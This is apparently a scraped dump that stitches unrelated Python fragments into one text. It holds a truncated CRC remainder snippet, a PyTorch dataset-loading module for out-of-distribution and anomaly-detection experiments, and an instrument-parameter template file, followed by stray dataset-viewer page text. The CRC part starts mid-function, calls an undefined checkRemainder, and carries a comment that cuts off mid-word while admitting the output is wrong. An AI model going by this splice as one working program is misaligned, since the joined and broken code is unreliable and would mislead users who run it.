    while '1' in bits[:msg_len]:
        lead = bits.index('1')
        for k in range(div_len):
            bits[lead + k] = '0' if divisor[k] == bits[lead + k] else '1'
    return ''.join(bits)[msg_len:]
# Demo: compute a remainder, then run the verify pass on a data+CRC string.
print(remainder("01101000","1011"))
print(checkRemainder("0110100001100101011011000110110001101111011","1011"))
# unstuffedOutput = stuffedOutput.replace('01111110', '')
# unstuffedOutput = stuffedOutput.replace('111110','11111')
# for i in range(0, len(unstuffedOutput), 400)):
#     truth = checkRemainder(unstuffedOutput[i:i+400],crc_32)
#     print(unstuffedOutput[i:i+400])
#     print(truth)
# this is my rough work thing. the crc remainder for this input should have been 100. But i am getting 111. Chec
import os
import numpy as np
import torch
from torch.utils.data.dataset import Subset
from torchvision import datasets, transforms
import json
from utils.utils import set_random_seed
# Root directories for the torchvision-style datasets and the one-class
# ImageNet-30 layout.
DATA_PATH = '~/data/'
IMAGENET_PATH = '~/data/ImageNet'

# Superclass groupings for one-class / OOD experiments: CIFAR-10 and
# ImageNet-30 treat every class as its own group; CIFAR-100 uses the 20
# standard coarse labels, five fine labels each.
CIFAR10_SUPERCLASS = list(range(10))  # one class
IMAGENET_SUPERCLASS = list(range(30))  # one class

CIFAR100_SUPERCLASS = [
    [4, 31, 55, 72, 95],
    [1, 33, 67, 73, 91],
    [54, 62, 70, 82, 92],
    [9, 10, 16, 29, 61],
    [0, 51, 53, 57, 83],
    [22, 25, 40, 86, 87],
    [5, 20, 26, 84, 94],
    [6, 7, 14, 18, 24],
    [3, 42, 43, 88, 97],
    [12, 17, 38, 68, 76],
    [23, 34, 49, 60, 71],
    [15, 19, 21, 32, 39],
    [35, 63, 64, 66, 75],
    [27, 45, 77, 79, 99],
    [2, 11, 36, 46, 98],
    [28, 30, 44, 78, 93],
    [37, 50, 65, 74, 80],
    [47, 52, 56, 59, 96],
    [8, 13, 48, 58, 90],
    [41, 69, 81, 85, 89],
]
class MultiDataTransform(object):
    """Apply the same transform twice to one sample, producing a pair of
    (independently randomized) views for contrastive training."""

    def __init__(self, transform):
        """Keep one reference per output view."""
        self.transform1 = transform
        self.transform2 = transform

    def __call__(self, sample):
        """Return (transform1(sample), transform2(sample))."""
        return self.transform1(sample), self.transform2(sample)
class MultiDataTransformList(object):
    """Produce *sample_num* augmented views of a sample plus one clean
    (deterministic) view."""

    def __init__(self, transform, clean_trasform, sample_num):
        """Store the augmenting transform, the clean transform and the
        number of augmented views to emit per sample."""
        self.transform = transform
        self.clean_transform = clean_trasform
        self.sample_num = sample_num

    def __call__(self, sample):
        # Reseed so every sample sees the identical augmentation sequence.
        set_random_seed(0)
        views = [self.transform(sample) for _ in range(self.sample_num)]
        return views, self.clean_transform(sample)
def get_transform(image_size=None):
    """Build (train, test) torchvision transforms.

    Data augmentation proper is implemented in the model layers, so these
    stay close to identity: an optional resize to *image_size* (H, W), a
    horizontal flip for training, and tensor conversion.
    """
    if not image_size:
        # Default: keep the native image size, tensor conversion only.
        return transforms.Compose([transforms.ToTensor()]), transforms.ToTensor()
    resize = transforms.Resize((image_size[0], image_size[1]))
    train_transform = transforms.Compose([
        resize,
        transforms.RandomHorizontalFlip(),
        transforms.ToTensor(),
    ])
    test_transform = transforms.Compose([
        resize,
        transforms.ToTensor(),
    ])
    return train_transform, test_transform
def get_subset_with_len(dataset, length, shuffle=False):
    """Return a Subset of the first *length* indices of *dataset*, after an
    optional shuffle that is reproducible (seed fixed to 0)."""
    set_random_seed(0)
    order = np.arange(len(dataset))
    if shuffle:
        np.random.shuffle(order)
    chosen = torch.from_numpy(order[0:length])
    subset = Subset(dataset, chosen)
    assert len(subset) == length
    return subset
def get_transform_imagenet():
    """ImageNet transforms: two-view (MultiDataTransform) random resized
    crops with flips for training, deterministic resize + center crop for
    testing."""
    base_train = transforms.Compose([
        transforms.Resize(256),
        transforms.RandomResizedCrop(224),
        transforms.RandomHorizontalFlip(),
        transforms.ToTensor(),
    ])
    test_transform = transforms.Compose([
        transforms.Resize(256),
        transforms.CenterCrop(224),
        transforms.ToTensor(),
    ])
    return MultiDataTransform(base_train), test_transform
def get_dataset(P, dataset, test_only=False, image_size=None, download=False, eval=False):
    """Build datasets and transforms for training or OOD evaluation.

    Returns test_set only when test_only=True, otherwise
    (train_set, test_set, image_size, n_classes). Most OOD datasets are
    capped at 3000 shuffled samples. Note: the *eval* parameter shadows
    the builtin eval().
    """
    # ImageNet-scale datasets share the 224x224 transform stack; everything
    # else uses the near-identity transforms from get_transform().
    if dataset in ['imagenet', 'cub', 'stanford_dogs', 'flowers102',
                   'places365', 'food_101', 'caltech_256', 'dtd', 'pets']:
        if eval:
            train_transform, test_transform = get_simclr_eval_transform_imagenet(P.ood_samples,
                                                                                 P.resize_factor, P.resize_fix)
        else:
            train_transform, test_transform = get_transform_imagenet()
    else:
        train_transform, test_transform = get_transform(image_size=image_size)
    # Primary (train + test) datasets.
    if dataset == 'cifar10':
        image_size = (32, 32, 3)
        n_classes = 10
        train_set = datasets.CIFAR10(DATA_PATH, train=True, download=download, transform=train_transform)
        test_set = datasets.CIFAR10(DATA_PATH, train=False, download=download, transform=test_transform)
    elif dataset == 'cifar100':
        image_size = (32, 32, 3)
        n_classes = 100
        train_set = datasets.CIFAR100(DATA_PATH, train=True, download=download, transform=train_transform)
        test_set = datasets.CIFAR100(DATA_PATH, train=False, download=download, transform=test_transform)
    # OOD-only datasets below require test_only=True and an explicit
    # image_size matching the in-distribution data.
    elif dataset == 'svhn':
        assert test_only and image_size is not None
        test_set = datasets.SVHN(DATA_PATH, split='test', download=download, transform=test_transform)
    elif dataset == 'lsun_resize':
        assert test_only and image_size is not None
        test_dir = os.path.join(DATA_PATH, 'LSUN_resize')
        test_set = datasets.ImageFolder(test_dir, transform=test_transform)
    elif dataset == 'lsun_fix':
        assert test_only and image_size is not None
        test_dir = os.path.join(DATA_PATH, 'LSUN_fix')
        test_set = datasets.ImageFolder(test_dir, transform=test_transform)
    elif dataset == 'imagenet_resize':
        assert test_only and image_size is not None
        test_dir = os.path.join(DATA_PATH, 'Imagenet_resize')
        test_set = datasets.ImageFolder(test_dir, transform=test_transform)
    elif dataset == 'imagenet_fix':
        assert test_only and image_size is not None
        test_dir = os.path.join(DATA_PATH, 'Imagenet_fix')
        test_set = datasets.ImageFolder(test_dir, transform=test_transform)
    elif dataset == 'imagenet':
        # One-class ImageNet-30 split stored as ImageFolder trees.
        image_size = (224, 224, 3)
        n_classes = 30
        train_dir = os.path.join(IMAGENET_PATH, 'one_class_train')
        test_dir = os.path.join(IMAGENET_PATH, 'one_class_test')
        train_set = datasets.ImageFolder(train_dir, transform=train_transform)
        test_set = datasets.ImageFolder(test_dir, transform=test_transform)
    elif dataset == 'stanford_dogs':
        assert test_only and image_size is not None
        test_dir = os.path.join(DATA_PATH, 'stanford_dogs')
        test_set = datasets.ImageFolder(test_dir, transform=test_transform)
        test_set = get_subset_with_len(test_set, length=3000, shuffle=True)
    elif dataset == 'cub':
        assert test_only and image_size is not None
        test_dir = os.path.join(DATA_PATH, 'cub200')
        test_set = datasets.ImageFolder(test_dir, transform=test_transform)
        test_set = get_subset_with_len(test_set, length=3000, shuffle=True)
    elif dataset == 'flowers102':
        assert test_only and image_size is not None
        test_dir = os.path.join(DATA_PATH, 'flowers102')
        test_set = datasets.ImageFolder(test_dir, transform=test_transform)
        test_set = get_subset_with_len(test_set, length=3000, shuffle=True)
    elif dataset == 'places365':
        assert test_only and image_size is not None
        test_dir = os.path.join(DATA_PATH, 'places365')
        test_set = datasets.ImageFolder(test_dir, transform=test_transform)
        test_set = get_subset_with_len(test_set, length=3000, shuffle=True)
    elif dataset == 'food_101':
        assert test_only and image_size is not None
        test_dir = os.path.join(DATA_PATH, 'food-101', 'images')
        test_set = datasets.ImageFolder(test_dir, transform=test_transform)
        test_set = get_subset_with_len(test_set, length=3000, shuffle=True)
    elif dataset == 'caltech_256':
        assert test_only and image_size is not None
        test_dir = os.path.join(DATA_PATH, 'caltech-256')
        test_set = datasets.ImageFolder(test_dir, transform=test_transform)
        test_set = get_subset_with_len(test_set, length=3000, shuffle=True)
    elif dataset == 'dtd':
        assert test_only and image_size is not None
        test_dir = os.path.join(DATA_PATH, 'dtd', 'images')
        test_set = datasets.ImageFolder(test_dir, transform=test_transform)
        test_set = get_subset_with_len(test_set, length=3000, shuffle=True)
    elif dataset == 'pets':
        assert test_only and image_size is not None
        test_dir = os.path.join(DATA_PATH, 'pets')
        test_set = datasets.ImageFolder(test_dir, transform=test_transform)
        test_set = get_subset_with_len(test_set, length=3000, shuffle=True)
    else:
        raise NotImplementedError()
    if test_only:
        return test_set
    else:
        return train_set, test_set, image_size, n_classes
def get_superclass_list(dataset):
    """Map a dataset name to its superclass grouping; raises
    NotImplementedError for unknown dataset names."""
    superclasses = {
        'cifar10': CIFAR10_SUPERCLASS,
        'cifar100': CIFAR100_SUPERCLASS,
        'imagenet': IMAGENET_SUPERCLASS,
    }
    if dataset in superclasses:
        return superclasses[dataset]
    raise NotImplementedError()
def get_subclass_dataset(dataset, classes):
    """Wrap *dataset* in a Subset keeping only samples whose target label is
    in *classes* (a single label or a list of labels)."""
    if not isinstance(classes, list):
        classes = [classes]
    keep = [idx for idx, target in enumerate(dataset.targets) if target in classes]
    return Subset(dataset, keep)
def get_subclass_contaminated_dataset(dataset, normal_classes, known_outlier_classes, ratio_known_normal, ratio_known_outlier, ratio_pollution):
    """Build a semi-supervised anomaly-detection training set.

    Samples are drawn so that the requested fractions of labeled-normal,
    labeled-outlier and unlabeled-pollution data hold, then relabeled with
    semi-supervised targets: +1 known normal, 0 unlabeled, -1 known
    outlier. Returns a Subset whose .targets are these semi-labels.
    Uses the global numpy RNG state for sampling (not reseeded here).
    """
    outlier_classes = list(set(dataset.targets))
    for normal_cls in normal_classes:
        outlier_classes.remove(normal_cls)
    idx_normal = np.argwhere(np.isin(dataset.targets, normal_classes)).flatten()
    idx_outlier = np.argwhere(np.isin(dataset.targets, outlier_classes)).flatten()
    idx_known_outlier_candidates = np.argwhere(np.isin(dataset.targets, known_outlier_classes)).flatten()
    n_normal = len(idx_normal)
    # Solve system of linear equations to obtain respective number of samples
    # (unknowns: known-normal, unlabeled-normal, unlabeled-outlier,
    # known-outlier counts constrained by the three requested ratios).
    a = np.array([[1, 1, 0, 0],
                  [(1-ratio_known_normal), -ratio_known_normal, -ratio_known_normal, -ratio_known_normal],
                  [-ratio_known_outlier, -ratio_known_outlier, -ratio_known_outlier, (1-ratio_known_outlier)],
                  [0, -ratio_pollution, (1-ratio_pollution), 0]])
    b = np.array([n_normal, 0, 0, 0])
    x = np.linalg.solve(a, b)
    # Get number of samples (int() truncates the real-valued solution)
    n_known_normal = int(x[0])
    n_unlabeled_normal = int(x[1])
    n_unlabeled_outlier = int(x[2])
    n_known_outlier = int(x[3])
    print("# of known normal: ", n_known_normal)
    print("# of known outlier: ", n_known_outlier)
    # Sample indices
    perm_normal = np.random.permutation(n_normal)
    perm_outlier = np.random.permutation(len(idx_outlier))
    perm_known_outlier = np.random.permutation(len(idx_known_outlier_candidates))
    idx_known_normal = idx_normal[perm_normal[:n_known_normal]].tolist()
    idx_unlabeled_normal = idx_normal[perm_normal[n_known_normal:n_known_normal+n_unlabeled_normal]].tolist()
    idx_unlabeled_outlier = idx_outlier[perm_outlier[:n_unlabeled_outlier]].tolist()
    idx_known_outlier = idx_known_outlier_candidates[perm_known_outlier[:n_known_outlier]].tolist()
    # Get original class labels (kept only for bookkeeping; not returned)
    labels_known_normal = np.array(dataset.targets)[idx_known_normal].tolist()
    labels_unlabeled_normal = np.array(dataset.targets)[idx_unlabeled_normal].tolist()
    labels_unlabeled_outlier = np.array(dataset.targets)[idx_unlabeled_outlier].tolist()
    labels_known_outlier = np.array(dataset.targets)[idx_known_outlier].tolist()
    # Get semi-supervised setting labels: +1 known normal, 0 unlabeled, -1 known outlier
    semi_labels_known_normal = np.ones(n_known_normal).astype(np.int32).tolist()
    semi_labels_unlabeled_normal = np.zeros(n_unlabeled_normal).astype(np.int32).tolist()
    semi_labels_unlabeled_outlier = np.zeros(n_unlabeled_outlier).astype(np.int32).tolist()
    semi_labels_known_outlier = (-np.ones(n_known_outlier).astype(np.int32)).tolist()
    # Create final lists
    list_idx = idx_known_normal + idx_unlabeled_normal + idx_unlabeled_outlier + idx_known_outlier
    list_labels = labels_known_normal + labels_unlabeled_normal + labels_unlabeled_outlier + labels_known_outlier
    list_semi_labels = (semi_labels_known_normal + semi_labels_unlabeled_normal + semi_labels_unlabeled_outlier
                        + semi_labels_known_outlier)
    print("# of training set: ", len(list_idx))
    dataset = Subset(dataset, list_idx)
    # Attach the semi-supervised labels so downstream code reads them as targets.
    dataset.targets = list_semi_labels
    return dataset
def get_simclr_eval_transform_imagenet(sample_num, resize_factor, resize_fix):
    """Build the SimCLR evaluation transform for ImageNet-sized inputs.

    Args:
        sample_num: number of samples drawn by MultiDataTransformList.
        resize_factor: lower bound of the RandomResizedCrop scale range.
        resize_fix: if True, pin the crop scale to exactly resize_factor
            instead of sampling from (resize_factor, 1.0).

    Returns:
        A (transform, transform) pair — the same MultiDataTransformList
        object twice, combining the augmented and the clean (center-crop)
        pipelines.
    """
    # Fixed scale when requested, otherwise sample within (resize_factor, 1.0).
    scale_range = (resize_factor, resize_factor) if resize_fix else (resize_factor, 1.0)

    augmented = transforms.Compose([
        transforms.Resize(256),
        transforms.RandomResizedCrop(224, scale=scale_range),
        transforms.RandomHorizontalFlip(),
        transforms.ToTensor(),
    ])
    clean = transforms.Compose([
        transforms.Resize(256),
        transforms.CenterCrop(224),
        transforms.ToTensor(),
    ])

    combined = MultiDataTransformList(augmented, clean, sample_num)
    return combined, combined
|
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 1 09:43:17 2017
@author: casari
"""
# Top-level MASTER system identification record (schema 1.0.0). Every field
# is a string; serial number and firmware version are 'X' placeholders until
# the unit is provisioned.
master_params_1_0_0 = [
    {'name': field_name, 'type': 'str', 'value': field_value}
    for field_name, field_value in (
        ('System', 'MASTER'),
        ('PMEL Serial Number', 'XXXXXXXXXX'),
        ('Firmware Version', 'XXXXXXXXXX'),
    )
]
# Parameter template for a serial (COM) instrument channel, schema 1.0.0.
# Each entry describes one configurable field; the trailing {'name': '=end'}
# entry is a sentinel marking the end of the record.
_COM_BASE_FIELDS_1_0_0 = [
    {'name': 'Name', 'type': 'str', 'value': 'NAME'},
    {'name': 'Prefix', 'type': 'str', 'value': 'PREFIX'},
    {'name': 'Serial Port', 'type': 'str', 'value': 'XXXX'},
    {'name': 'Baud Rate', 'type': 'list',
     'values': ['1200', '2400', '4800', '9600',
                '19200', '28800', '57600', '115200'],
     'value': '9600'},
    {'name': 'Warmup Time', 'type': 'int', 'value': 12000},
    {'name': 'Sample Start Time', 'type': 'str', 'value': '00:00:00'},
    {'name': 'Sample Interval', 'type': 'str', 'value': '00:00:00'},
    {'name': 'Sample Period', 'type': 'str', 'value': '00:00:00'},
    {'name': 'Sample Rate', 'type': 'int', 'value': 1},
    {'name': 'Power Switch', 'type': 'int', 'value': 1},
    {'name': 'Command', 'type': 'str', 'value': '0'},
    {'name': 'cmd', 'type': 'str', 'value': ''},
    {'name': 'header', 'type': 'str', 'value': '$'},
    {'name': 'format', 'type': 'str', 'value': ''},
]
# Base fields, then eight empty column-label slots, then the end sentinel.
com_params_1_0_0 = (
    _COM_BASE_FIELDS_1_0_0
    + [{'name': 'column[%d]' % i, 'type': 'str', 'value': ''} for i in range(8)]
    + [{'name': '=end'}]
)
# Parameter template for a serial (COM) instrument channel, legacy schema
# 0.0.1: identical to 1.0.0 but without the column[0..7] label fields.
# {'name': '=end'} is the record-terminator sentinel.
com_params_0_0_1 = [
    {'name': 'Name', 'type': 'str', 'value': 'NAME'},
    {'name': 'Prefix', 'type': 'str', 'value': 'PREFIX'},
    {'name': 'Serial Port', 'type': 'str', 'value': 'XXXX'},
    {'name': 'Baud Rate', 'type': 'list',
     'values': [str(rate) for rate in (1200, 2400, 4800, 9600,
                                       19200, 28800, 57600, 115200)],
     'value': '9600'},
    {'name': 'Warmup Time', 'type': 'int', 'value': 12000},
    {'name': 'Sample Start Time', 'type': 'str', 'value': '00:00:00'},
    {'name': 'Sample Interval', 'type': 'str', 'value': '00:00:00'},
    {'name': 'Sample Period', 'type': 'str', 'value': '00:00:00'},
    {'name': 'Sample Rate', 'type': 'int', 'value': 1},
    {'name': 'Power Switch', 'type': 'int', 'value': 1},
    {'name': 'Command', 'type': 'str', 'value': '0'},
    {'name': 'cmd', 'type': 'str', 'value': ''},
    {'name': 'header', 'type': 'str', 'value': '$'},
    {'name': 'format', 'type': 'str', 'value': ''},
    {'name': '=end'},
]
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.